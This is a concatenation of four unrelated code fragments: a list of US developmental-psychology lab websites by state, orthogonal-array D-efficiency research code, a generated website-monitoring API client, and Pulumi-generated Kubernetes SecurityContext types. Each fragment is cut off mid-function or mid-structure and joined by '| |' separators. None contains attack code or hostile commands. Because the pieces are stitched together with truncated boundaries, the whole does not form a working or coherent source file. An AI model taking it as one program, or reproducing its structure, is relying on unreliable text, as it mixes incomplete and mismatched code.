'url': 'http://bdl.uoregon.edu/Participants/participants.php',
'name': 'University of Oregon Brain Development Lab'
},
{
'url': 'http://www.uolearninglab.com',
'name': 'University of Oregon Learning Lab'
}
],
"Pennsylvania": [
{
'url': 'http://www.temple.edu/infantlab/',
'name': 'Temple Infant & Child Lab'
},
{
'url': 'http://lncd.pitt.edu/wp/',
'name': 'University of Pittsburgh Laboratory of Neurocognitive Development'
},
{
'url': 'https://sites.sas.upenn.edu/cogdevlab/',
'name': 'UPenn Cognition & Development Lab'
},
{
'url': 'http://babylab.psych.psu.edu/',
'name': 'Penn State Brain Development Lab'
}
],
"Rhode Island": [
{
'url': 'http://www.brown.edu/Research/dcnl/',
'name': 'Brown University Developmental Cognitive Neuroscience Lab'
}
],
"South Carolina": [
{
'url': 'http://academicdepartments.musc.edu/joseph_lab/',
'name': 'MUSC Brain, Cognition, & Development Lab'
}
],
"South Dakota": [],
"Tennessee": [
{
'url': 'http://web.utk.edu/~infntlab/',
'name': 'UT Knoxville Infant Perception-Action Lab'
},
{
'url': 'http://peabody.vanderbilt.edu/departments/psych/research/research_labs/educational_cognitive_neuroscience_lab/index.php',
'name': 'Vanderbilt Educational Cognitive Neuroscience Lab'
}
],
"Texas": [
{
'url': 'http://www.ccdlab.net/',
'name': 'UT-Austin Culture, | |
pfig=None, cache=1, selectfullrank=0, basedir='/home/eendebakpt/oatmp/final/', oadir='/home/eendebakpt/misc/oa/oacode/'):
""" Helper function: extend a full series with D-efficiency selection """
datadir = basedir + \
'/oa%d-%d-t%d-small-fullrank%d' % (N, kfinal, t, selectfullrank)
if not os.path.exists(datadir):
os.mkdir(datadir)
os.chdir(datadir)
k = kfinal
m = 1 + k + k * (k - 1) / 2
s = oalib.intVector([2] * kfinal)
adata = oalib.arraydata_t(s, N, t, k)
if verbose:
print('generateABcase: case: %s, k %d, m %d' % (str(adata), k, m))
selectionmaxn = [1e9] * kfinal
adata.writeConfigFile('oaconfig.txt')
for ii in range(t, k + 1):
adatax = oalib.arraydata_t(adata, ii)
adatax.writeConfigFile('oaconfig%d.txt' % ii)
cmdlog = os.path.join(datadir, 'commandlog.txt')
cmdlogfid = open(cmdlog, 'w')
# Create root array
adata0 = oalib.arraydata_t(adata, t)
al = oalib.array_link(N, t, -1)
al.create_root(adata0)
sols = oalib.arraylist_t()
sols.append(al)
outfile = ('result-') + adata0.idstr() + '.oa'
oalib.writearrayfile(outfile, sols)
cmdlogfid.write('# Create root array, write to %s' % outfile)
# First analysis
extendInitial(datadir, adata, kstart, verbose=1, cache=1, cmdlog=cmdlogfid)
adata0 = oalib.arraydata_t(adata, kstart)
afile0 = os.path.join(datadir, 'result-' + adata0.idstr() + '.oa')
if verbose:
print(' initial file: %d solutions' % oalib.nArrays(afile0))
outfile = ('result-') + adata0.idstr() + '.oa'
anafile = analyseFile(outfile, method='full', verbose=1, cache=1)
anafile = anafile[1]
if 0:
data = ABhelper.loadAnalysisFile(anafile)
A = data[:, 1]
B = data[:, 2]
Acc = 1e-15**(1. / m)
idx = A > Acc
a = A[idx]
b = B[idx]
print(' initial file: max A %.3f, min B %.3f' %
(safemax(a), safemin(b)))
print(' initial: 95th percentile of A score: %.2f' %
np.percentile(a, 95))
kmax = kfinal
if 0:
plt.figure(2)
plt.clf()
bins = np.arange(0, 1, .025)
x = plt.hist(a.flatten(), bins)
plt.xlabel('A value')
plt.ylabel('Frequency')
Acurr = plotAthresholds(Afinal, kfinal, kstart)
print('selecting %d/%d arrays' % ((a > Acurr).sum(), a.size))
plt.legend(loc=2)
plt.title(r'Initial part of case %s' % adata.latexstr())
# init
k = kstart
adata0 = oalib.arraydata_t(adata, kstart)
outfile0 = ('result-') + adata0.idstr() + '.oa'
outfile = 'resultdynamic-' + adata0.idstr() + '.oa'
shutil.copyfile(outfile0, outfile)
averbose = 0
totaltime = 0
for kk in range(kstart, kfull):
# Initial input: show
k = kk
adata0 = oalib.arraydata_t(adata, k)
afile = os.path.join(
datadir, 'resultdynamic-' + adata0.idstr() + '.oa')
anafile = analyseFile(afile, verbose=1, cache=cache)
if 0:
data = ABhelper.loadAnalysisFile(anafile, ncols=1)
fig = drawAvalues(data, fig=100 + kk)
plotAthresholdsY(Afinal, kfinal)
print('level %d: %d arrays, Amax %.5f' %
(k, data.size, safemax(data, 0)))
# Calculate: k to k+1
kn = k + 1
adatan = oalib.arraydata_t(adata, kn)
nextfile = os.path.join(
datadir, 'resultdynamic-' + adatan.idstr() + '.oa')
logfile = nextfile.replace('.oa', '-log.txt')
cmd = dynamicExtendFile(afile, nextfile, kfinal=kfinal, Afinal=Afinal,
cmdlog=cmdlogfid, verbose=1, logfile=logfile, cache=cache)
dt = parseProcessingTime(logfile)
totaltime += dt
print('processing: %.0f [s], %.1f [h]' % (dt, float(dt) / 3600))
adata0 = oalib.arraydata_t(adata, kfull)
infile = 'resultdynamic-' + adata0.idstr() + '.oa'
nextfile = 'selecteddynamicresult-' + adata0.idstr() + '.oa'
shutil.copyfile(infile, nextfile)
# Prepare for selection rounds
for kk in range(kfull, kfinal):
if verbose:
print('# selection round %d->%d' % (kk, kk + 1))
k = kk
adata0 = oalib.arraydata_t(adata, k)
afile = os.path.join(
datadir, 'selecteddynamicresult-' + adata0.idstr() + '.oa')
outfile = 'selecteddynamic-' + adata0.idstr() + '.oa'
m = int(1 + adata0.ncols + adata0.ncols * (adata0.ncols - 1) / 2)
if checkFiles(outfile, cache=cache):
if verbose >= 3:
print(' skipping analysis')
cmdlogfid.write(
'# Select best [x] arrays, write to file %s\n\n' % (outfile))
else:
if selectfullrank:
anafiles = analyseFile(
afile, method='full', verbose=1, cache=cache)
data = loadAnalysisFile(anafiles[1])
a = data[:, 1]
r = data[:, 0]
ngoodrank = (r == m).sum()
ngoodrank2 = (a > 1e-10).sum()
if ngoodrank != ngoodrank2:
print(
'warning: rank calculation has numerical stability issues?')
else:
anafiles = analyseFile(
afile, verbose=1, method='full', cache=cache)
data = loadAnalysisFile(anafiles[1])
a = data[:, 1]
fig = drawAvalues(data, fig=100 + k)
plotAthresholdsY(Afinal, kfinal, k)
plt.title(r'Case $%s$: %d columns, selection' %
(adata.latexstr(), k))
if 1:
Dvals = data[:, 1]
Amax = oahelper.safemax(Dvals)
Amin = oahelper.safemin(Dvals)
# rr[kk]['Amax']=Amax
print(
'generateABcase: %d columns: Amax %.4f, Amin %4f', (kk, Amax, Amin))
if data.size > 0:
fraction = min(
max(float(selectionmaxn[k]) / data.size, .0001), 1)
else:
fraction = 1
inx = np.argsort(a.flatten())[::-1]
nn = int(np.ceil(fraction * a.size))
if selectfullrank:
if nn > ngoodrank and ngoodrank > 1:
v1 = a[inx[ngoodrank - 1]]
v2 = a[inx[ngoodrank]]
if verbose:
print(' good rank threshold: %e -> %e' % (v1, v2))
print(' good rank threshold: C %e -> %e' %
(v1**m, v2**m))
if selectfullrank:
if verbose:
print(' selectfullrank: reducing %d arrays to %d' %
(nn, ngoodrank))
nn = min(nn, ngoodrank)
if verbose:
print('final round %d columns: input %d arrays, reduced to %d' %
(k, data.size, nn))
if a.size > 0:
fig = drawAvalues(a[inx[0:nn]], fig=200 + k)
plt.title(r'Case $%s$: %d columns, selection, sorted' %
(adata.latexstr(), k))
ABhelper.selectArrays(afile, outfile, inx[0:nn], cache=cache)
# outfilerest = 'selecteddynamicrest-' + adata0.idstr() + '.oa'
# ABhelper.selectArrays(afile, outfilerest, inx[nn:], cache=cache)
cmdlogfid.write(
'# Select best %d arrays, write to file %s\n\n' % (nn, outfile))
kn = k + 1
adatan = oalib.arraydata_t(adata, kn)
nextfile = 'selecteddynamicresult-' + adatan.idstr() + '.oa'
logfile = nextfile.replace('.oa', '-log.txt')
cmd = dynamicExtendFile(outfile, nextfile, kfinal=kfinal, Afinal=Afinal,
verbose=1, cmdlog=cmdlogfid, logfile=logfile, cache=cache)
dt = parseProcessingTime(logfile)
totaltime += dt
print(
'processing: final step %.0f [s], %.1f [h]' % (dt, float(dt) / 3600))
afile = nextfile
adatan = oalib.arraydata_t(adata, kfinal)
anafiles = analyseFile(afile, method='full', verbose=1, cache=cache)
anafile = anafiles[1]
data = loadAnalysisFile(anafile, ncolshint=4)
A = data[:, 1]
B = data[:, 2]
rnk = data[:, 0]
Acc = 1e-15**(1. / m)
idx = A > Acc
a = A[idx]
b = B[idx]
k = adatan.ncols
m = 1 + k + k * (k - 1) / 2
nmaxrnk = (rnk == m).nonzero()[0].size
# Final selection ##
gidxmask = A >= Afinal
if selectfullrank:
print('selectfullrank: go! ')
# rnk.shape
# www=rnk
# A.shape
gidxmask = (A >= Afinal) * (rnk == m)
bidxmask = gidxmask == False
gidx = gidxmask.nonzero()[0]
bidx = bidxmask.nonzero()[0]
outfile = 'finalselection-' + adatan.idstr() + '-A%.2f' % Afinal + '.oa'
if gidx.size > 300:
afmode = oalib.ABINARY
else:
afmode = oalib.ATEXT
selectArrays(afile, outfile, gidx, verbose=1, cache=cache, afmode=afmode)
print('generateABcase: make VIF selection (non-generate)')
outfileVIF = 'finalselection-VIF-' + \
adatan.idstr() + '-A%.2f' % Afinal + '.oa'
Bc = B.copy()
Bc[Bc == 0] = np.inf
nmaxvif = min(80, B.nonzero()[0].size)
selectionArraysScore(
afile, outfileVIF, Bc, nmax=nmaxvif, order='ascending', cache=cache)
if 0:
ll = oapackage.readarrayfile(outfileVIF)
print('Bc==0\n')
print(Bc == 0)
print(np.abs(Bc) < 1e-5)
print(Bc)
idx = np.argsort(Bc.flatten())
print(idx)
print('--- written %s ------ (cache %d)\n' % (outfileVIF, cache))
oapackage.oainfo(afile)
oapackage.oainfo(outfileVIF)
for al in ll:
print(al.VIFefficiency())
if a.size > 0:
print('%d/%d arrays above threshold %.3f. max A value %.5f' %
(gidx.size, A.size, Afinal, a.max()))
else:
print('%d/%d arrays above threshold %.3f. max A value %.5f' %
(gidx.size, A.size, Afinal, 0))
rr = dict({'adata': adata, 'maxDeff': safemax(a), 'minB': safemin(b, np.inf), 'totaltime':
totaltime, 'nselected': gidx.size, 'narrays': A.size, 'outfile': outfile, 'datadir': datadir})
rr['outfileVIF'] = outfileVIF
rr['abscatterplot'] = None
rr['calcmode'] = selectfullrank
figfile = 'finalDAscatter.png'
if not pfig is None:
if 0:
fig = drawAvalues(data, fig=100)
if gidx.size > 0:
plt.plot(gidx, A[gidx], '.b')
if bidx.size > 0:
plt.plot(bidx, A[bidx], '.r')
figfile = 'finalselection.png'
plt.savefig(figfile)
plotABfigure(a, b, figid=100 + 1, verbose=1, fontsize=13)
plotABboundaries(Acc=Acc)
ss = adata.latexstr()
ss = ss.replace('\\OA', r'\mathrm{OA}')
plt.title(r'Scatterplot for $%s$' % ss, fontsize=18)
plt.savefig(figfile)
if verbose:
print('generating scatterplot: %s' % figfile)
if gidx.size > 20 and adata.strength < 4 and nmaxrnk > 0:
rr['abscatterplot'] = figfile
rr['datadir'] = datadir
rr['fullcalc'] = selectfullrank == 0 and Afinal == 0
sys.stdout.flush()
if Afinal == 0:
rr['mode'] = 'full'
else:
rr['mode'] = 'partial'
rr['specialcase'] = 0
rr['kstart'] = kstart
rr['Afinal'] = Afinal
rr['kfinal'] = kfinal
return rr
# Estimate total number of arrays
# %%
def tickfontsize(fontsize=14, ax=None):
""" Set the font size for ticks on the x- and y-axis """
if ax is None:
ax = plt.gca()
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(fontsize)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(fontsize)
plt.draw()
# %%
def generateStatistics(afile, nbest=10, verbose=1, doprojef=0):
# FIXME: incomplete function
# data=...
# gma=...
data = []
ll = oalib.readarrayfile(afile)
data = np.zeros((len(ll), 5))
for ii, al in enumerate(ll):
data[ii, 1] = al.Defficiency()
data[ii, 2] = al.VIFefficiency()
data[ii, 3] = al.Eefficiency()
alxf = oalib.array2xf(al)
data[ii, 0] = alxf.rank()
gma = np.zeros((len(ll), ll[0].n_columns | |
query_params.append(('format', params['format'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Website', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_checkpoint_data_by_id(self, srv_id, check_id, **kwargs): # noqa: E501
"""get data for a website checkpoint # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_checkpoint_data_by_id(srv_id, check_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int srv_id: (required)
:param int check_id: (required)
:param float period:
:param int start:
:param int end:
:param str datapoints:
:param str format:
:return: WebsiteCheckpointRawData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_website_checkpoint_data_by_id_with_http_info(srv_id, check_id, **kwargs) # noqa: E501
else:
(data) = self.get_website_checkpoint_data_by_id_with_http_info(srv_id, check_id, **kwargs) # noqa: E501
return data
def get_website_checkpoint_data_by_id_with_http_info(self, srv_id, check_id, **kwargs): # noqa: E501
"""get data for a website checkpoint # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_checkpoint_data_by_id_with_http_info(srv_id, check_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int srv_id: (required)
:param int check_id: (required)
:param float period:
:param int start:
:param int end:
:param str datapoints:
:param str format:
:return: WebsiteCheckpointRawData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['srv_id', 'check_id', 'period', 'start', 'end', 'datapoints', 'format'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_website_checkpoint_data_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'srv_id' is set
if ('srv_id' not in params or
params['srv_id'] is None):
raise ValueError("Missing the required parameter `srv_id` when calling `get_website_checkpoint_data_by_id`") # noqa: E501
# verify the required parameter 'check_id' is set
if ('check_id' not in params or
params['check_id'] is None):
raise ValueError("Missing the required parameter `check_id` when calling `get_website_checkpoint_data_by_id`") # noqa: E501
if 'srv_id' in params and not re.search('\d+', params['srv_id'] if type(params['srv_id']) is str else str(params['srv_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `srv_id` when calling `get_website_checkpoint_data_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
if 'check_id' in params and not re.search('\d+', params['check_id'] if type(params['check_id']) is str else str(params['check_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `check_id` when calling `get_website_checkpoint_data_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'srv_id' in params:
path_params['srvId'] = params['srv_id'] # noqa: E501
if 'check_id' in params:
path_params['checkId'] = params['check_id'] # noqa: E501
query_params = []
if 'period' in params:
query_params.append(('period', params['period'])) # noqa: E501
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'end' in params:
query_params.append(('end', params['end'])) # noqa: E501
if 'datapoints' in params:
query_params.append(('datapoints', params['datapoints'])) # noqa: E501
if 'format' in params:
query_params.append(('format', params['format'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{srvId}/checkpoints/{checkId}/data', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebsiteCheckpointRawData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_data_by_graph_name(self, id, graph_name, **kwargs): # noqa: E501
"""get website data by graph name # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_data_by_graph_name(id, graph_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str graph_name: (required)
:param int start:
:param int end:
:param str format:
:return: GraphPlot
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_website_data_by_graph_name_with_http_info(id, graph_name, **kwargs) # noqa: E501
else:
(data) = self.get_website_data_by_graph_name_with_http_info(id, graph_name, **kwargs) # noqa: E501
return data
def get_website_data_by_graph_name_with_http_info(self, id, graph_name, **kwargs): # noqa: E501
"""get website data by graph name # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_data_by_graph_name_with_http_info(id, graph_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str graph_name: (required)
:param int start:
:param int end:
:param str format:
:return: GraphPlot
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'graph_name', 'start', 'end', 'format'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_website_data_by_graph_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_website_data_by_graph_name`") # noqa: E501
# verify the required parameter 'graph_name' is set
if ('graph_name' not in params or
params['graph_name'] is None):
raise ValueError("Missing the required parameter `graph_name` when calling `get_website_data_by_graph_name`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_website_data_by_graph_name`, must conform to the pattern `/\d+/`") # noqa: E501
if 'graph_name' in params and not re.search('.+', params['graph_name'] if type(params['graph_name']) is str else str(params['graph_name'])): # noqa: E501
raise ValueError("Invalid value for parameter `graph_name` when calling `get_website_data_by_graph_name`, must conform to the pattern `/.+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
if 'graph_name' in params:
path_params['graphName'] = params['graph_name'] # noqa: E501
query_params = []
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'end' in params:
query_params.append(('end', params['end'])) # noqa: E501
if 'format' in params:
query_params.append(('format', params['format'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}/graphs/{graphName}/data', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GraphPlot', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_website_graph_data(self, website_id, checkpoint_id, graph_name, **kwargs): # noqa: E501
"""get website graph data # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_graph_data(website_id, checkpoint_id, graph_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int website_id: (required)
:param int checkpoint_id: (required)
:param str graph_name: (required)
:param int start:
:param int end:
:param str format:
:return: GraphPlot
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_website_graph_data_with_http_info(website_id, checkpoint_id, graph_name, **kwargs) # noqa: E501
else:
(data) = self.get_website_graph_data_with_http_info(website_id, checkpoint_id, graph_name, **kwargs) # noqa: E501
return data
def get_website_graph_data_with_http_info(self, website_id, checkpoint_id, graph_name, **kwargs): # noqa: E501
"""get website graph data # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_website_graph_data_with_http_info(website_id, checkpoint_id, graph_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int website_id: (required)
:param int checkpoint_id: (required)
:param str graph_name: (required)
:param int start:
:param int end:
:param str format:
:return: GraphPlot
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['website_id', 'checkpoint_id', 'graph_name', 'start', 'end', 'format'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_website_graph_data" % key
)
| |
will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
if allow_privilege_escalation is not None:
pulumi.set(__self__, "allow_privilege_escalation", allow_privilege_escalation)
if capabilities is not None:
pulumi.set(__self__, "capabilities", capabilities)
if privileged is not None:
pulumi.set(__self__, "privileged", privileged)
if proc_mount is not None:
pulumi.set(__self__, "proc_mount", proc_mount)
if read_only_root_filesystem is not None:
pulumi.set(__self__, "read_only_root_filesystem", read_only_root_filesystem)
if run_as_group is not None:
pulumi.set(__self__, "run_as_group", run_as_group)
if run_as_non_root is not None:
pulumi.set(__self__, "run_as_non_root", run_as_non_root)
if run_as_user is not None:
pulumi.set(__self__, "run_as_user", run_as_user)
if se_linux_options is not None:
pulumi.set(__self__, "se_linux_options", se_linux_options)
if windows_options is not None:
pulumi.set(__self__, "windows_options", windows_options)
@property
@pulumi.getter(name="allowPrivilegeEscalation")
def allow_privilege_escalation(self) -> Optional[bool]:
"""
AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN
"""
return pulumi.get(self, "allow_privilege_escalation")
@property
@pulumi.getter
def capabilities(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextCapabilities']:
"""
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
"""
return pulumi.get(self, "capabilities")
@property
@pulumi.getter
def privileged(self) -> Optional[bool]:
"""
Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false.
"""
return pulumi.get(self, "privileged")
@property
@pulumi.getter(name="procMount")
def proc_mount(self) -> Optional[str]:
"""
procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled.
"""
return pulumi.get(self, "proc_mount")
@property
@pulumi.getter(name="readOnlyRootFilesystem")
def read_only_root_filesystem(self) -> Optional[bool]:
"""
Whether this container has a read-only root filesystem. Default is false.
"""
return pulumi.get(self, "read_only_root_filesystem")
@property
@pulumi.getter(name="runAsGroup")
def run_as_group(self) -> Optional[int]:
"""
The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "run_as_group")
@property
@pulumi.getter(name="runAsNonRoot")
def run_as_non_root(self) -> Optional[bool]:
"""
Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "run_as_non_root")
@property
@pulumi.getter(name="runAsUser")
def run_as_user(self) -> Optional[int]:
"""
The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "run_as_user")
@property
@pulumi.getter(name="seLinuxOptions")
def se_linux_options(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextSeLinuxOptions']:
"""
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "se_linux_options")
@property
@pulumi.getter(name="windowsOptions")
def windows_options(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextWindowsOptions']:
"""
The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "windows_options")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextCapabilities(dict):
"""
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
"""
def __init__(__self__, *,
add: Optional[Sequence[str]] = None,
drop: Optional[Sequence[str]] = None):
"""
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
:param Sequence[str] add: Added capabilities
:param Sequence[str] drop: Removed capabilities
"""
if add is not None:
pulumi.set(__self__, "add", add)
if drop is not None:
pulumi.set(__self__, "drop", drop)
@property
@pulumi.getter
def add(self) -> Optional[Sequence[str]]:
"""
Added capabilities
"""
return pulumi.get(self, "add")
@property
@pulumi.getter
def drop(self) -> Optional[Sequence[str]]:
"""
Removed capabilities
"""
return pulumi.get(self, "drop")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextSeLinuxOptions(dict):
"""
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
def __init__(__self__, *,
level: Optional[str] = None,
role: Optional[str] = None,
type: Optional[str] = None,
user: Optional[str] = None):
"""
The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param str level: Level is SELinux level label that applies to the container.
:param str role: Role is a SELinux role label that applies to the container.
:param str type: Type is a SELinux type label that applies to the container.
:param str user: User is a SELinux user label that applies to the container.
"""
if level is not None:
pulumi.set(__self__, "level", level)
if role is not None:
pulumi.set(__self__, "role", role)
if type is not None:
pulumi.set(__self__, "type", type)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def level(self) -> Optional[str]:
"""
Level is SELinux level label that applies to the container.
"""
return pulumi.get(self, "level")
@property
@pulumi.getter
def role(self) -> Optional[str]:
"""
Role is a SELinux role label that applies to the container.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Type is a SELinux type label that applies to the container.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def user(self) -> Optional[str]:
"""
User is a SELinux user label that applies to the container.
"""
return pulumi.get(self, "user")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecInitContainersSecurityContextWindowsOptions(dict):
"""
The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
def __init__(__self__, *,
gmsa_credential_spec: Optional[str] = None,
gmsa_credential_spec_name: Optional[str] = None,
run_as_user_name: Optional[str] = None):
"""
The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
:param str gmsa_credential_spec: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field.
:param str gmsa_credential_spec_name: GMSACredentialSpecName is the name of the GMSA credential spec to use.
:param str run_as_user_name: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
if gmsa_credential_spec is not None:
pulumi.set(__self__, "gmsa_credential_spec", gmsa_credential_spec)
if gmsa_credential_spec_name is not None:
pulumi.set(__self__, "gmsa_credential_spec_name", gmsa_credential_spec_name)
if run_as_user_name is not None:
pulumi.set(__self__, "run_as_user_name", run_as_user_name)
@property
@pulumi.getter(name="gmsaCredentialSpec")
def gmsa_credential_spec(self) -> Optional[str]:
"""
GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field.
"""
